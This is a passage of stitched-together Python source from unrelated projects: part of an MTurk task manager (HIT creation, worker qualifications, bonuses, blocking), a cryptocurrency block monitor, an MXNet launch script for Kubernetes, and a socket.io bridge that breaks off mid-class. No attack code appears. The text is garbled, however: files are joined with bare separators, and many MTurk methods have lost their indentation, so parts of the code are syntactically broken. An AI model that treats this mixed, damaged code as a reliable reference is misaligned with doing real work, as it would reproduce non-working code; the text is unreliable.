        self.is_shutdown = True
        try:
            self.expire_all_unassigned_hits()
            self._expire_onboarding_pool()
            self._expire_agent_pool()
            self._wait_for_task_expirations()
            for assignment_id in self.assignment_to_onboard_thread:
                self.assignment_to_onboard_thread[assignment_id].join()
        except BaseException:
            # best-effort teardown: never let cleanup errors propagate
            pass
        finally:
            # external resources are released even if expiration failed
            if self.server_task_name is not None:
                server_utils.delete_server(self.server_task_name,
                                           self.opt['local'])
            if self.topic_arn is not None:
                mturk_utils.delete_sns_topic(self.topic_arn)
            if self.opt['unique_worker'] and not self.opt['unique_qual_name']:
                mturk_utils.delete_qualification(self.unique_qual_id,
                                                 self.is_sandbox)
            if self.socket_manager is not None:
                self.socket_manager.shutdown()
            if self.logging_permitted and not self.is_sandbox and \
                    not self.is_test:
                self._upload_worker_data()
            if self.worker_manager is not None:
                self.worker_manager.shutdown()
# MTurk Agent Interaction Functions #
    def force_expire_hit(self, worker_id, assign_id, text=None, ack_func=None):
        """Send a command to expire a hit to the provided agent, update State
        to reflect that the HIT is now expired

        :param text: message shown to the worker; a default is used if None.
        :param ack_func: optional callback run on acknowledgement; the
            worker's socket channel is closed afterwards either way.
        """
        # Expire in the state
        agent = self.worker_manager._get_agent(worker_id, assign_id)
        if agent is not None:
            if agent.is_final():
                # already in a terminal state, nothing left to expire
                return
            agent.set_status(AssignState.STATUS_EXPIRED)
            agent.hit_is_expired = True
        if ack_func is None:
            def use_ack_func(*args):
                self.socket_manager.close_channel(
                    '{}_{}'.format(worker_id, assign_id))
        else:
            def use_ack_func(*args):
                ack_func(*args)
                self.socket_manager.close_channel(
                    '{}_{}'.format(worker_id, assign_id))
        # Send the expiration command
        if text is None:
            text = ('This HIT is expired, please return and take a new '
                    'one if you\'d want to work on this task.')
        data = {'text': data_model.COMMAND_EXPIRE_HIT, 'inactive_text': text}
        self.send_command(worker_id, assign_id, data, ack_func=use_ack_func)
    def handle_turker_timeout(self, worker_id, assign_id):
        """To be used by the MTurk agent when the worker doesn't send a message
        within the expected window.

        Expires the HIT for the silent worker and notifies the rest of the
        conversation of the disconnect.
        """
        # Expire the hit for the disconnected user
        text = ('You haven\'t entered a message in too long. As these HITs '
                ' often require real-time interaction, this hit has '
                'been expired and you have been considered disconnected. '
                'Disconnect too frequently and you will be blocked from '
                'working on these HITs in the future.')
        self.force_expire_hit(worker_id, assign_id, text)
        # Send the disconnect event to all workers in the convo
        self._handle_agent_disconnect(worker_id, assign_id)
    def send_message(self, receiver_id, assignment_id, data,
                     blocking=True, ack_func=None):
        """Send a message through the socket manager,
        update conversation state

        :return: the unique message_id assigned to the outgoing packet.
        """
        data = data.copy()  # Ensure data packet is sent in current state
        data['type'] = data_model.MESSAGE_TYPE_MESSAGE
        # Force messages to have a unique ID
        if 'message_id' not in data:
            data['message_id'] = str(uuid.uuid4())
        conversation_id = None
        agent = self.worker_manager._get_agent(receiver_id, assignment_id)
        if agent is not None:
            conversation_id = agent.conversation_id
        event_id = shared_utils.generate_event_id(receiver_id)
        packet = Packet(
            event_id,
            Packet.TYPE_MESSAGE,
            self.socket_manager.get_my_sender_id(),
            receiver_id,
            assignment_id,
            data,
            conversation_id=conversation_id,
            blocking=blocking,
            ack_func=ack_func
        )
        shared_utils.print_and_log(
            logging.INFO,
            'Manager sending: {}'.format(packet),
            should_print=self.opt['verbose']
        )
        # Push outgoing message to the message thread to be able to resend
        # on a reconnect event
        if agent is not None:
            agent.append_message(packet.data)
        self.socket_manager.queue_packet(packet)
        return data['message_id']
    def send_command(self, receiver_id, assignment_id, data, blocking=True,
                     ack_func=None):
        """Sends a command through the socket manager,
        update conversation state

        Unlike send_message, this mutates the given data dict in place and
        does not attach a message_id.
        """
        data['type'] = data_model.MESSAGE_TYPE_COMMAND
        event_id = shared_utils.generate_event_id(receiver_id)
        packet = Packet(
            event_id,
            Packet.TYPE_MESSAGE,
            self.socket_manager.get_my_sender_id(),
            receiver_id,
            assignment_id,
            data,
            blocking=blocking,
            ack_func=ack_func
        )
        agent = self.worker_manager._get_agent(receiver_id, assignment_id)
        if (data['text'] != data_model.COMMAND_CHANGE_CONVERSATION and
                data['text'] != data_model.COMMAND_RESTORE_STATE and
                agent is not None):
            # Append last command, as it might be necessary to restore state
            agent.set_last_command(packet.data)
        self.socket_manager.queue_packet(packet)
    def mark_workers_done(self, workers):
        """Mark a group of agents as done to keep state consistent

        Also grants the uniqueness qualification where configured so workers
        cannot take the task again, and logs working time under time limits.
        """
        for agent in workers:
            if self.is_unique:
                assert self.unique_qual_name is not None, \
                    'Unique qual name must not be none to use is_unique'
                self.give_worker_qualification(
                    agent.worker_id,
                    self.unique_qual_name,
                )
            if not agent.is_final():
                agent.set_status(AssignState.STATUS_DONE)
            if self.max_hits_per_worker > 0:
                worker_state = self.worker_manager._get_worker(agent.worker_id)
                completed_assignments = worker_state.completed_assignments()
                assert self.unique_qual_name is not None, 'Unique qual name ' \
                    'must not be none to use max_hits_per_worker'
                # soft-block workers who hit their per-worker submission cap
                if completed_assignments >= self.max_hits_per_worker:
                    self.give_worker_qualification(
                        agent.worker_id,
                        self.unique_qual_name,
                    )
            if self.has_time_limit:
                self._log_working_time(agent)
def free_workers(self, workers):
"""End completed worker threads"""
for agent in workers:
self.socket_manager.close_channel(agent.get_connection_id())
# Amazon MTurk Server Functions #
    def get_agent_work_status(self, assignment_id):
        """Return the MTurk work status for the given assignment (delegates
        to the worker manager)."""
        return self.worker_manager.get_agent_work_status(assignment_id)
    def get_qualification_list(self, qualifications=None):
        """Return the qualification requirements to attach to new HITs.

        The list is computed once and cached on self.qualifications; later
        calls return a copy of the cache. Disconnect, soft-block, daily
        time-limit, and uniqueness qualifications are appended as configured
        in self.opt.
        """
        if self.qualifications is not None:
            # cached: return a copy so callers cannot mutate our state
            return self.qualifications.copy()
        if qualifications is None:
            qualifications = []
        if not self.is_sandbox and not self.is_test:
            try:
                import parlai_internal.mturk.configs as local_configs
                qualifications = \
                    local_configs.set_default_qualifications(qualifications)
            except Exception:
                # not all users will be drawing configs from internal settings
                pass
        if self.opt['disconnect_qualification'] is not None:
            block_qual_id = mturk_utils.find_or_create_qualification(
                self.opt['disconnect_qualification'],
                'A soft ban from using a ParlAI-created HIT due to frequent '
                'disconnects from conversations, leading to negative '
                'experiences for other Turkers and for the requester.',
                self.is_sandbox,
            )
            assert block_qual_id is not None, (
                'Hits could not be created as disconnect qualification could '
                'not be acquired. Shutting down server.'
            )
            qualifications.append({
                'QualificationTypeId': block_qual_id,
                'Comparator': 'DoesNotExist',
                'ActionsGuarded': 'DiscoverPreviewAndAccept'
            })
        # Add the soft block qualification if it has been specified
        if self.opt['block_qualification'] is not None:
            block_qual_id = mturk_utils.find_or_create_qualification(
                self.opt['block_qualification'],
                'A soft ban from this ParlAI-created HIT at the requesters '
                'discretion. Generally used to restrict how frequently a '
                'particular worker can work on a particular task.',
                self.is_sandbox,
            )
            assert block_qual_id is not None, (
                'Hits could not be created as block qualification could not be'
                ' acquired. Shutting down server.'
            )
            qualifications.append({
                'QualificationTypeId': block_qual_id,
                'Comparator': 'DoesNotExist',
                'ActionsGuarded': 'DiscoverPreviewAndAccept'
            })
        if self.has_time_limit:
            block_qual_name = '{}-max-daily-time'.format(self.task_group_id)
            if self.opt['max_time_qual'] is not None:
                block_qual_name = self.opt['max_time_qual']
            self.max_time_qual = block_qual_name
            block_qual_id = mturk_utils.find_or_create_qualification(
                block_qual_name,
                'A soft ban from working on this HIT or HITs by this '
                'requester based on a maximum amount of daily work time set '
                'by the requester.',
                self.is_sandbox,
            )
            assert block_qual_id is not None, (
                'Hits could not be created as a time block qualification could'
                ' not be acquired. Shutting down server.'
            )
            qualifications.append({
                'QualificationTypeId': block_qual_id,
                'Comparator': 'DoesNotExist',
                'ActionsGuarded': 'DiscoverPreviewAndAccept'
            })
        if self.is_unique or self.max_hits_per_worker > 0:
            self.unique_qual_name = self.opt.get('unique_qual_name')
            if self.unique_qual_name is None:
                self.unique_qual_name = self.task_group_id + '_max_submissions'
            self.unique_qual_id = mturk_utils.find_or_create_qualification(
                self.unique_qual_name,
                'Prevents workers from completing a task too frequently',
                self.is_sandbox,
            )
            qualifications.append({
                'QualificationTypeId': self.unique_qual_id,
                'Comparator': 'DoesNotExist',
                'ActionsGuarded': 'DiscoverPreviewAndAccept'
            })
        self.qualifications = qualifications
        return qualifications.copy()
    def create_additional_hits(self, num_hits, qualifications=None):
        """Handle creation for a specific number of hits/assignments
        Put created HIT ids into the hit_id_list

        :return: the MTurk preview URL of the last HIT created, or None when
            num_hits is 0.
        """
        shared_utils.print_and_log(logging.INFO,
                                   'Creating {} hits...'.format(num_hits))
        qualifications = self.get_qualification_list(qualifications)
        self.opt['assignment_duration_in_seconds'] = self.opt.get(
            'assignment_duration_in_seconds', 30 * 60)
        hit_type_id = mturk_utils.create_hit_type(
            hit_title=self.opt['hit_title'],
            hit_description='{} (ID: {})'.format(self.opt['hit_description'],
                                                 self.task_group_id),
            hit_keywords=self.opt['hit_keywords'],
            hit_reward=self.opt['reward'],
            # Set to 30 minutes by default
            assignment_duration_in_seconds=self.opt.get(
                'assignment_duration_in_seconds', 30 * 60),
            is_sandbox=self.opt['is_sandbox'],
            qualifications=qualifications,
            auto_approve_delay=self.auto_approve_delay,
        )
        mturk_chat_url = '{}/chat_index?task_group_id={}'.format(
            self.server_url,
            self.task_group_id
        )
        shared_utils.print_and_log(logging.INFO, mturk_chat_url)
        mturk_page_url = None
        if self.topic_arn is not None:
            # route HIT lifecycle notifications to our SNS topic
            mturk_utils.subscribe_to_hits(
                hit_type_id,
                self.is_sandbox,
                self.topic_arn
            )
        for _i in range(num_hits):
            mturk_page_url, hit_id, mturk_response = \
                mturk_utils.create_hit_with_hit_type(
                    opt=self.opt,
                    page_url=mturk_chat_url,
                    hit_type_id=hit_type_id,
                    num_assignments=1,
                    is_sandbox=self.is_sandbox
                )
            if self.db_logger is not None:
                self.db_logger.log_hit_status(mturk_response)
            self.hit_id_list.append(hit_id)
        return mturk_page_url
    def create_hits(self, qualifications=None):
        """Create hits based on the managers current config, return hit url"""
        shared_utils.print_and_log(logging.INFO, 'Creating HITs...', True)
        if self.task_state < self.STATE_ACCEPTING_WORKERS:
            shared_utils.print_and_log(
                logging.WARN,
                'You should be calling `ready_to_accept_workers` before '
                '`create_hits` to ensure that the socket is connected before'
                'hits are added. This will be enforced in future versions.',
                True
            )
        if self.opt['max_connections'] == 0:
            # no connection cap: launch every required HIT up front
            mturk_page_url = self.create_additional_hits(
                num_hits=self.required_hits,
                qualifications=qualifications,
            )
        else:
            # capped: launch at most max_connections HITs now; more are
            # created later as conversations complete
            mturk_page_url = self.create_additional_hits(
                num_hits=min(self.required_hits, self.opt['max_connections']),
                qualifications=qualifications,
            )
        shared_utils.print_and_log(logging.INFO,
                                   'Link to HIT: {}\n'.format(mturk_page_url),
                                   should_print=True)
        shared_utils.print_and_log(
            logging.INFO,
            'Waiting for Turkers to respond... (Please don\'t close'
            ' your laptop or put your computer into sleep or standby mode.)\n',
            should_print=True
        )
        self.task_state = self.STATE_HITS_MADE
        return mturk_page_url
def get_hit(self, hit_id):
"""Get hit from mturk by hit_id"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
hit = client.get_hit(HITId=hit_id)
if self.db_logger is not None:
try:
self.db_logger.log_hit_status(hit)
except Exception:
pass
return hit
def get_assignment(self, assignment_id):
"""Gets assignment from mturk by assignment_id. Only works if the
assignment is in a completed state
"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
return client.get_assignment(AssignmentId=assignment_id)
def get_assignments_for_hit(self, hit_id):
"""Get completed assignments for a hit"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
assignments_info = client.list_assignments_for_hit(HITId=hit_id)
return assignments_info.get('Assignments', [])
    def expire_all_unassigned_hits(self):
        """Move through the whole hit_id list and attempt to expire the
        HITs, though this only immediately expires those that aren't assigned.
        """
        # TODO note and mark assigned hits as ones to be expired later
        shared_utils.print_and_log(logging.INFO,
                                   'Expiring all unassigned HITs...',
                                   should_print=not self.is_test)
        completed_ids = self.worker_manager.get_complete_hits()
        for hit_id in self.hit_id_list:
            if hit_id not in completed_ids:
                # TODO get confirmation that the HIT is acutally expired
                mturk_utils.expire_hit(self.is_sandbox, hit_id)
def approve_work(self, assignment_id, override_rejection=False):
"""approve work for a given assignment through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.approve_assignment(
AssignmentId=assignment_id, OverrideRejection=override_rejection)
if self.db_logger is not None:
self.db_logger.log_approve_assignment(assignment_id)
shared_utils.print_and_log(
logging.INFO,
'Assignment {} approved.'
''.format(assignment_id),
)
def reject_work(self, assignment_id, reason):
"""reject work for a given assignment through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.reject_assignment(
AssignmentId=assignment_id,
RequesterFeedback=reason
)
if self.db_logger is not None:
self.db_logger.log_reject_assignment(assignment_id)
shared_utils.print_and_log(
logging.INFO,
'Assignment {} rejected for reason {}.'
''.format(assignment_id, reason),
)
def approve_assignments_for_hit(self, hit_id, override_rejection=False):
"""Approve work for assignments associated with a given hit, through
mturk client
"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
assignments = self.get_assignments_for_hit(hit_id)
for assignment in assignments:
assignment_id = assignment['AssignmentId']
client.approve_assignment(AssignmentId=assignment_id,
OverrideRejection=override_rejection)
def block_worker(self, worker_id, reason):
"""Block a worker by id using the mturk client, passes reason along"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.create_worker_block(WorkerId=worker_id, Reason=reason)
shared_utils.print_and_log(
logging.INFO,
'Worker {} blocked for reason {}.'
''.format(worker_id, reason),
)
def soft_block_worker(self, worker_id, qual='block_qualification'):
"""Soft block a worker by giving the worker the block qualification"""
qual_name = self.opt.get(qual, None)
assert qual_name is not None, ('No qualification {} has been specified'
'in opt'.format(qual))
self.give_worker_qualification(worker_id, qual_name)
def un_soft_block_worker(self, worker_id, qual='block_qualification'):
"""Remove a soft block from a worker by removing a block qualification
from the worker"""
qual_name = self.opt.get(qual, None)
assert qual_name is not None, ('No qualification {} has been specified'
'in opt'.format(qual))
self.remove_worker_qualification(worker_id, qual_name)
    def give_worker_qualification(self, worker_id, qual_name, qual_value=None):
        """Give a worker a particular qualification

        Logs a warning and grants nothing when the qualification cannot be
        found to exist.
        """
        qual_id = mturk_utils.find_qualification(qual_name, self.is_sandbox)
        if qual_id is False or qual_id is None:
            shared_utils.print_and_log(
                logging.WARN,
                'Could not give worker {} qualification {}, as the '
                'qualification could not be found to exist.'
                ''.format(worker_id, qual_name),
                should_print=True
            )
            return
        mturk_utils.give_worker_qualification(worker_id, qual_id, qual_value,
                                              self.is_sandbox)
        shared_utils.print_and_log(
            logging.INFO,
            'gave {} qualification {}'.format(worker_id, qual_name),
            should_print=True
        )
    def remove_worker_qualification(self, worker_id, qual_name, reason=''):
        """Remove a qualification from a worker

        Failures (e.g. the worker never had the qualification) are logged
        but not raised.
        """
        qual_id = mturk_utils.find_qualification(qual_name, self.is_sandbox)
        if qual_id is False or qual_id is None:
            shared_utils.print_and_log(
                logging.WARN,
                'Could not remove from worker {} qualification {}, as the '
                'qualification could not be found to exist.'
                ''.format(worker_id, qual_name),
                should_print=True
            )
            return
        try:
            mturk_utils.remove_worker_qualification(worker_id, qual_id,
                                                    self.is_sandbox, reason)
            shared_utils.print_and_log(
                logging.INFO,
                'removed {}\'s qualification {}'.format(worker_id, qual_name),
                should_print=True
            )
        except Exception as e:
            shared_utils.print_and_log(
                logging.WARN if not self.has_time_limit else logging.INFO,
                'removing {}\'s qualification {} failed with error {}. This '
                'can be because the worker didn\'t have that qualification.'
                ''.format(worker_id, qual_name, repr(e)),
                should_print=True
            )
def create_qualification(self, qualification_name, description,
can_exist=True):
"""Create a new qualification. If can_exist is set, simply return
the ID of the existing qualification rather than throw an error
"""
if not can_exist:
qual_id = mturk_utils.find_qualification(qualification_name,
self.is_sandbox)
if qual_id is not None:
shared_utils.print_and_log(
logging.WARN,
'Could not create qualification {}, as it existed'
''.format(qualification_name),
should_print=True
)
return None
return mturk_utils.find_or_create_qualification(
qualification_name,
description,
self.is_sandbox
)
    def pay_bonus(self, worker_id, bonus_amount, assignment_id, reason,
                  unique_request_token):
        """Handles paying bonus to a turker, fails for insufficient funds.
        Returns True on success and False on failure

        :param unique_request_token: idempotency token so retried requests
            do not double-pay the same bonus.
        """
        total_cost = mturk_utils.calculate_mturk_cost(
            payment_opt={'type': 'bonus', 'amount': bonus_amount}
        )
        if not mturk_utils.check_mturk_balance(balance_needed=total_cost,
                                               is_sandbox=self.is_sandbox):
            shared_utils.print_and_log(
                logging.WARN,
                'Cannot pay bonus. Reason: Insufficient '
                'funds in your MTurk account.',
                should_print=True
            )
            return False
        client = mturk_utils.get_mturk_client(self.is_sandbox)
        # unique_request_token may be useful for handling future network errors
        client.send_bonus(
            WorkerId=worker_id,
            BonusAmount=str(bonus_amount),
            AssignmentId=assignment_id,
            Reason=reason,
            UniqueRequestToken=unique_request_token
        )
        if self.db_logger is not None:
            self.db_logger.log_pay_extra_bonus(
                worker_id, assignment_id, bonus_amount, reason)
        shared_utils.print_and_log(
            logging.INFO,
            'Paid ${} bonus to WorkerId: {}'.format(
                bonus_amount,
                worker_id
            )
        )
        return True
def email_worker(self, worker_id, subject, message_text):
"""Send an email to a worker through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
response = client.notify_workers(
Subject=subject,
MessageText=message_text,
WorkerIds=[worker_id]
)
if len(response['NotifyWorkersFailureStatuses']) > 0:
failure_message = response['NotifyWorkersFailureStatuses'][0]
return {'failure': failure_message['NotifyWorkersFailureMessage']}
else:
return {'success': True}
|
monitor.py | #!/usr/bin/env python3
"""
This module specifies class Monitored designated for processing of cryptocurrencies blocks
"""
import threading
import logging
from timeit import default_timer as timer
from datetime import datetime, timedelta
from .coin import BTC, BCH, DASH, ZEC, LTC, ETH
from .database import Database
from .notifier import Notifier
logger = logging.getLogger(__name__)
class Monitor():
    """
    Monitor controls the processing of cryptocurrencies blocks.

    One worker thread is started per configured coin plus one for the
    notifier; all threads share a single stop event for coordinated
    shutdown.
    """

    def __init__(self, config):
        """
        Construct new Monitor object

        :param config: configuration dict
        """
        # FIX: these used to be class-level attributes; the mutable ones
        # (the Event and the coins/threads lists) were shared by every
        # Monitor instance. They are now created per instance.
        self.stop = threading.Event()
        self.coins = []
        self.threads = []
        self.config = config
        self.database = Database(config['db'], self.config)
        self.notifier = Notifier(config, self.database)
        for coin in config['coins']:
            coin_inst = coin(config, self.stop)
            coin_inst.db_id = self.database.get_coin(
                coin_inst.__class__.__name__)['id']
            self.coins.append(coin_inst)

    def shutdown(self, signum, frame):
        """
        Terminate threads of each component (signal-handler signature).
        """
        logger.info('Shutting down')  # fixed typo: was 'Shuting down'
        self.stop.set()
        for thread in self.threads:
            thread.join()
        self.notifier.process_remaining()

    def test_connection(self):
        """
        Test connectivity of all components

        :raises ConnectionError: when any coin node is unreachable
        """
        self.notifier.test_connection()
        for coin in self.coins:
            if not coin.test_connection():
                raise ConnectionError(
                    '{}: node unreachable'.format(coin.__class__.__name__))

    def start(self):
        """
        Start thread for every coin and notifier
        """
        for coin in self.coins:
            logger.info('%s: monitoring started', coin)
            thread = threading.Thread(target=self.worker, args=(coin,))
            self.threads.append(thread)
            thread.start()
        thread = threading.Thread(target=self.notifier.worker,
                                  args=(self.stop,))
        self.threads.append(thread)
        thread.start()

    def set_last_blocks(self):
        """
        Set the current block of each coin as the last processed
        """
        for coin in self.coins:
            number, block_hash = coin.get_last_block_number()
            self.database.insert_block(coin, number, block_hash)
            logger.info('%s: setting %s as last processed block', coin, number)

    def process_block(self, database, coin, number):
        """
        Process transactions of <coin> in a block of number <number>

        :param database: Database object
        :param coin: Coin object
        :param number: block number
        :return: number of the next block
        """
        time_start = timer()
        coin.get_block(number)
        block_id = database.insert_block(coin, number, coin.get_block_hash())
        logger.info('%s: processing block: %s', coin, number)
        cnt = 0
        for tx_hash in coin.get_block_transactions():
            addresses = coin.get_transaction_io(tx_hash)
            self.notifier.add_transaction(coin, number, block_id, tx_hash,
                                          addresses)
            cnt += 1
        time_total = timer() - time_start
        logger.debug('%s: processed %d transactions in %.4fs',
                     coin, cnt, time_total)
        return number + 1

    def last_processed_block(self, database, coin):
        """
        Get the last block processed of <coin>

        Walks back from the stored tip, deleting stored blocks whose hash no
        longer matches the node's (i.e. blocks orphaned by a chain reorg).

        :param database: Database object
        :param coin: Coin object
        :return: number of last processed block
        """
        number = database.get_last_block_number(coin)
        while True:
            hash_saved = database.get_block_hash(coin, number)
            hash_node = coin.get_block_hash(number)
            if hash_saved == hash_node or hash_saved is None:
                break
            database.delete_block(coin, number)
            number -= 1
        return number

    def worker(self, coin):
        """
        Process new blocks of cryptocurrency <coin> until stop event is set.

        :param coin: a class inherited from Coin
        """
        # Each worker thread uses its own Database connection.
        database = Database(self.config['db'], self.config)
        while not self.stop.is_set():
            current_number = self.last_processed_block(database, coin) + 1
            last_number, _ = coin.get_last_block_number()
            while current_number <= last_number:
                if self.stop.is_set():
                    break
                try:
                    current_number = self.process_block(database, coin,
                                                        current_number)
                except InterruptedError:
                    break
            until_next_block = (coin.get_block_creation_time() +
                                coin.get_block_time() -
                                datetime.now()).total_seconds()
            if until_next_block < 0:  # should be already generated
                # wait only a brief time (5% of block time) before retrying
                until_next_block = \
                    (coin.get_block_time() * 0.05).total_seconds()
            self.stop.wait(timeout=until_next_block)
        logger.info('%s: terminating', coin)
|
start.py | import sys
import os
import time
import requests
import socket
import subprocess
import threading
import logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s.%(msecs)03d %(levelname)s: %(message)s', datefmt="%Y-%m-%d %H:%M:%S")
ROLE = os.getenv("ROLE")
HOST_NAME = os.getenv("HOSTNAME") # exported by k8s
HOST_IP = socket.gethostbyname(HOST_NAME)
NUM_WORKER = os.getenv("DMLC_NUM_WORKER")
NUM_SERVER = os.getenv("DMLC_NUM_SERVER")
APISERVER = "http://10.28.1.1:8080"
API = "/api/v1/namespaces/"
NAMESPACE = "default"
JOB_SELECTOR = "labelSelector=name="
JOB_NAME = os.getenv("JOB_NAME") # export via env
PROG = os.getenv("PROG") # the python main file starting training
WORK_DIR = os.getenv("WORK_DIR")
BATCH_SIZE = os.getenv("BATCH_SIZE")
KV_STORE = os.getenv("KV_STORE")
'''
Get all pods of this job
'''
def get_podlist():
    """Ask the k8s API server for every pod belonging to this job.

    Uses the mounted service-account bearer token when one is present.
    :return: decoded JSON pod list from the API server
    """
    pod = API + NAMESPACE + "/pods?"
    url = APISERVER + pod + JOB_SELECTOR + JOB_NAME
    token_path = '/var/run/secrets/kubernetes.io/serviceaccount/token'
    if not os.path.isfile(token_path):
        return requests.get(url, verify=False).json()
    # FIX: the token file handle was previously opened and never closed
    with open(token_path, 'r') as token_file:
        token = token_file.read()
    headers = {"Authorization": "Bearer " + token}
    return requests.get(url, headers=headers, verify=False).json()
'''
check whether all pods are running
'''
def is_all_running(podlist):
    """Return True when every pod in <podlist> reports phase 'Running'."""
    require = len(podlist["items"])
    running = sum(1 for pod in podlist["items"]
                  if pod["status"]["phase"] == "Running")
    logging.info("waiting for pods running, require:" + str(require) + ", running:" + str(running))
    return require == running
'''
get pod <ip, id> mapping
'''
def get_map(podlist):
    """Build a pod-IP -> rank mapping for this job's pods.

    IPs are sorted as strings; the first (lowest) one is published as the
    global SCHEDULER_IP.
    """
    global SCHEDULER_IP
    addresses = sorted(pod["status"]["podIP"] for pod in podlist["items"])
    SCHEDULER_IP = str(addresses[0])
    return {address: rank for rank, address in enumerate(addresses)}
def start_scheduler(cmd, env):
    """Launch the DMLC scheduler process in a background daemon thread.

    Mutates <env> to set DMLC_ROLE=scheduler, so callers should pass a copy.
    'scheduler' is not in conflict with 'server' since they start at
    different times.
    """
    logging.info("starting scheduler ...")
    env['DMLC_ROLE'] = 'scheduler'
    # FIX: run subprocess.check_call directly as the thread target instead of
    # a lambda wrapper, and use the daemon attribute (setDaemon is deprecated)
    scheduler = threading.Thread(
        target=subprocess.check_call,
        args=(cmd,),
        kwargs={'env': env, 'shell': True},
    )
    scheduler.daemon = True
    scheduler.start()
def main():
    """Build the training command from env vars and run this pod's role.

    For distributed kv-stores, waits for all job pods to be Running, derives
    DMLC_* settings from the pod IPs, and starts the scheduler on the pod
    with the lowest IP before launching the local server/worker process.
    """
    global ROLE
    logging.info("starting script ...")
    # interprete command
    cmd = "cd " + WORK_DIR + "../ && " + PROG
    if BATCH_SIZE is not None and BATCH_SIZE != '':
        cmd = cmd + " " + "--batch-size" + " " + BATCH_SIZE
    if KV_STORE is not None and KV_STORE != '':
        cmd = cmd + " " + "--kv-store" + " " + KV_STORE
    logging.info("cmd: " + cmd)
    env = os.environ.copy()
    if 'dist' in KV_STORE:
        logging.info("Distributed training: " + KV_STORE)
        # check pod status
        podlist = get_podlist()
        logging.debug(str(podlist))
        while not is_all_running(podlist):
            time.sleep(1)
            podlist = get_podlist()
        # get_map also publishes the global SCHEDULER_IP as a side effect
        map = get_map(podlist)
        logging.info(str(map))
        # the scheduler runs on the first node
        SCHEDULER_PORT = "6060"
        logging.info("scheduler IP: " + SCHEDULER_IP + ", scheduler port: " + SCHEDULER_PORT)
        env['DMLC_PS_ROOT_URI'] = SCHEDULER_IP
        env['DMLC_PS_ROOT_PORT'] = SCHEDULER_PORT
        env['DMLC_NUM_WORKER'] = NUM_WORKER
        env['DMLC_NUM_SERVER'] = NUM_SERVER
        # env['PS_VERBOSE'] = '2'
        logging.info("self role: " + ROLE + " self IP: " + HOST_IP)
        if SCHEDULER_IP == HOST_IP:
            logging.info("master: start initialization ...")
            # copy so the scheduler thread's DMLC_ROLE doesn't clobber ours
            start_scheduler(cmd, env.copy())
    # start ps/worker
    if ROLE == "ps":
        ROLE = "server"
    env['DMLC_ROLE'] = ROLE
    subprocess.check_call(cmd, env=env, shell=True)
    logging.info("Task finished successfully!")
if __name__ == '__main__':
    if len(sys.argv) != 1:
        # FIX: parenthesized print is valid on both Python 2 and Python 3;
        # the previous bare print statements were Python-2-only syntax.
        print("Description: MXNet start script in k8s cluster")
        print("Usage: python start.py")
        sys.exit(1)
    main()
socket_io.py | '''
A socket.io bridge for Python
This gives Python users access to socket.io, a node.js library. This library
provides simple and efficient bidirectional communication between browsers
and servers over a message-oriented socket. Transport is normalized over
various technologies including WebSockets, Flash sockets, and AJAX polling.
For the latest source, visit https://github.com/evanw/socket.io-python
'''
import os
import json
import atexit
import socket
import tempfile
import subprocess
import multiprocessing
# Create temporary files (the generated node.js bridge script) in the
# current working directory instead of the system temp dir.
tempfile.tempdir = os.getcwd()
# A socket.io template that connects to a Python socket over TCP and forwards
# messages as JSON strings separated by null characters. TCP was chosen over
# UDP to allow for arbitrarily large packets.
_js = '''
var net = require('net');
var io = require('socket.io').listen(%d);
io.set('log level', 1);
io.configure(function() {
io.set('authorization', function(handshakeData, callback) {
callback(null, true); // authorize client
});
});
// tcp connection to server
var tcp = net.createConnection(%d, 'localhost');
var buffer = '';
tcp.addListener('data', function(data) {
var i = 0;
while (i < data.length) {
if (data[i] == 0) {
sendToClient(JSON.parse(buffer + data.toString('utf8', 0, i)));
data = data.slice(i + 1);
buffer = '';
i = 0;
} else {
i++;
}
}
buffer += data.toString('utf8');
});
function sendToServer(client, command, data) {
data = JSON.stringify({
session: client.id,
command: command,
data: data,
address: client.handshake.address.address,
port: client.handshake.address.port
});
tcp.write(data + '\0');
}
function sendToClient(json) {
if (json.broadcast) {
io.sockets.send(json.data);
} else if (json.session in io.sockets.sockets) {
io.sockets.sockets[json.session].send(json.data);
}
}
io.sockets.on('connection', function(client) {
sendToServer(client, 'connect', null);
client.on('message', function(data) {
sendToServer(client, 'message', data);
});
client.on('disconnect', function() {
sendToServer(client, 'disconnect', null);
});
});
'''
class Client:
    '''
    A single browser connection owned by a Server.

    Attributes:
        server  - the Server instance that owns this connection
        session - the session id assigned by node (a string of numbers)
        address - the client's remote address
        port    - the client's remote port
    '''
    def __init__(self, server, session, address, port):
        self.port = port
        self.address = address
        self.session = session
        self.server = server

    def send(self, data):
        '''
        Transmit the string *data* to this client only.
        '''
        envelope = {'session': self.session}
        self.server._send(data, envelope)

    def __str__(self):
        '''
        Return "ADDRESS:PORT" describing the client's remote endpoint.
        '''
        return '{0}:{1}'.format(self.address, self.port)
class Server:
    '''
    This is a socket.io server, and is meant to be subclassed. A subclass
    might look like this:

        import socket_io as io

        class Server(io.Server):
            def on_connect(self, client):
                print client, 'connected'
                self.broadcast(str(client) + ' connected')
                print 'there are now', len(self.clients), 'clients'

            def on_message(self, client, message):
                print client, 'sent', message
                client.send(message)

            def on_disconnect(self, client):
                print client, 'disconnected'
                self.broadcast(str(client) + ' disconnected')
                print 'there are now', len(self.clients), 'clients'

        Server().listen(5000)

    The server has self.clients, a dictionary of client session ids to
    Client instances.

    NOTE(review): this module is written for Python 2 — os.write() with a
    str and socket.send() with a str would raise TypeError on Python 3.
    '''
    def __init__(self):
        # Maps node.js session ids (strings) to Client instances.
        self.clients = {}
    def _handle(self, info):
        # Dispatch one decoded JSON message from node.js to the on_*
        # callbacks. info carries 'command', 'session', and (depending on
        # the command) 'data', 'address', and 'port' keys.
        command = info['command']
        session = info['session']
        if command == 'connect':
            self.clients[session] = Client(self, session, info['address'], info['port'])
            self.on_connect(self.clients[session])
        elif command == 'message':
            # Silently drop messages for sessions we never saw connect.
            if session in self.clients:
                self.on_message(self.clients[session], info['data'])
        elif command == 'disconnect':
            if session in self.clients:
                client = self.clients[session]
                # Remove the entry before the callback so self.clients is
                # already consistent if on_disconnect() inspects it.
                del self.clients[session]
                self.on_disconnect(client)
    def on_connect(self, client):
